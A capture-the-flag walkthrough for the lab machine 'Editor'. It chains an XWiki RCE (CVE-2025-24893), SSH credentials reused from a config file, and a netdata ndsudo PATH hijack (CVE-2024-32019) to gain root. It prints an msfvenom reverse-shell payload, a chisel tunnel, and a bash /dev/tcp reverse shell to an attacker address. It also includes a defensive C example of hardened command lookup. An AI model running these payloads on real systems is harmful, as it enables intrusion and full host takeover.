Editor
Initial machine information
Services may take up to 5 minutes to load.
Overview
Editor is a Linux machine running XWiki 15.10.8, which is vulnerable to a pre-authentication remote code execution vulnerability (CVE-2025-24893). After gaining a shell, the MySQL credentials in the XWiki Hibernate config turn out to be reused for SSH access as the oliver user. Privilege escalation abuses netdata group membership and the ndsudo binary's PATH vulnerability (CVE-2024-32019) to achieve a root shell.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.34.144 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.34.144
Port 80 resolves to a named host. Discovery reveals wiki.editor.htb hosting XWiki:
XWiki Debian 15.10.8
Add wiki.editor.htb and editor.htb to /etc/hosts.
Foothold
CVE-2025-24893 - XWiki RCE
XWiki 15.10.8 is vulnerable to CVE-2025-24893, a pre-authentication remote code execution vulnerability. The PoC is available at:
https://github.com/gunzf0x/CVE-2025-24893
Run the PoC against the target to obtain an initial shell.
Upgrade to Meterpreter
Upgrade the basic shell to a more stable Meterpreter session. Generate a Linux x64 Meterpreter ELF and serve it:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=tun0 lport=8443 -f elf -o ekg02
sudo python3 -m http.server 80
Fetch and execute from the XWiki shell, then catch the Meterpreter callback.
Credential Discovery - Hibernate Config
While Meterpreter runs, also execute linpeas for thorough enumeration. The XWiki hibernate configuration file contains MySQL credentials:
Path: /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF/hibernate.cfg.xml
The MySQL password is reused as the SSH password for the oliver user. Test it:
ssh [email protected]
It works. The user flag is accessible from oliver's home directory.
Privilege Escalation
netdata Group Membership
Oliver is a member of the netdata group:
id
# uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),1001(netdata)
Netdata (a performance monitoring tool) runs a web interface on port 19999. As a netdata group member, Oliver has access to the netdata installation files and the ndsudo binary.
Port Forward via Chisel
Port 19999 is only accessible locally. Forward it to the attacking machine using chisel:
# On attacker
./chisel server -p 9001 --reverse
# On target
./chisel client 10.10.14.X:9001 R:19999:localhost:19999
Browse http://localhost:19999 to access the Netdata web interface.
CVE-2024-32019 - ndsudo PATH Hijack
The ndsudo binary (part of Netdata) is vulnerable to CVE-2024-32019 - a PATH environment variable injection that allows privilege escalation because ndsudo executes commands without sanitising the PATH.
Create a malicious binary with the same name as a command that ndsudo calls, place it at the front of the PATH, and execute ndsudo:
# Create a malicious binary (e.g., named after whatever ndsudo calls)
echo '#!/bin/bash\n/bin/bash -i >& /dev/tcp/10.10.14.X/8443 0>&1' > /tmp/malicious
chmod +x /tmp/malicious
# Place it in PATH before the real binary
export PATH=/tmp:$PATH
# Execute ndsudo to trigger the hijack
ndsudo <command>
This yields a root shell.
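The root cause is a privileged helper resolving a command name through the caller's PATH. The following C sketch is an added example, not Netdata's code or its actual patch: it puts that weak lookup beside a hardened one that ignores PATH entirely. The function names, the TRUSTED_DIRS list and the sample command name "sh" are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Assumed list of trusted, root-owned directories (illustrative). */
static const char *TRUSTED_DIRS[] = {"/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL};

/* True if path is a regular file with the owner-execute bit set. */
static int is_exec_file(const char *path, struct stat *st) {
    return stat(path, st) == 0 && S_ISREG(st->st_mode) && (st->st_mode & S_IXUSR);
}

/* Weak pattern: the first match in the caller-controlled PATH wins. */
int resolve_via_env_path(const char *name, char *out, size_t n) {
    const char *d = getenv("PATH");
    struct stat st;
    while (d && *d) {
        size_t len = strcspn(d, ":");
        snprintf(out, n, "%.*s/%s", (int)len, d, name);
        if (len && is_exec_file(out, &st)) return 0;
        d += len + (d[len] == ':');
    }
    return -1;
}

/* Hardened pattern: ignore PATH, accept a bare name only, and require a
   root-owned file that neither group nor others can write. */
int resolve_trusted(const char *name, char *out, size_t n) {
    if (!name || !*name || strchr(name, '/')) return -1;
    for (size_t i = 0; TRUSTED_DIRS[i]; i++) {
        struct stat st;
        int len = snprintf(out, n, "%s/%s", TRUSTED_DIRS[i], name);
        if (len < 0 || (size_t)len >= n) continue;
        if (!is_exec_file(out, &st)) continue;
        if (st.st_uid == 0 && !(st.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    }
    if (n) out[0] = '\0';
    return -1;
}

int main(void) {
    char p[4096];
    /* "sh" is only a sample command name for the comparison. */
    printf("env PATH: %s\n", resolve_via_env_path("sh", p, sizeof p) == 0 ? p : "(none)");
    printf("trusted : %s\n", resolve_trusted("sh", p, sizeof p) == 0 ? p : "(none)");
    return 0;
}
```

A setuid helper that uses the second form should pass the resolved absolute path to execve() with a fixed, minimal environment rather than calling execvp().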
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | Subdomain enumeration | wiki.editor.htb → XWiki 15.10.8 |
| Foothold | CVE-2025-24893 XWiki RCE | Shell as www-data |
| Credential discovery | hibernate.cfg.xml MySQL password | oliver SSH access |
| Privesc | netdata group + CVE-2024-32019 ndsudo PATH | Root shell |

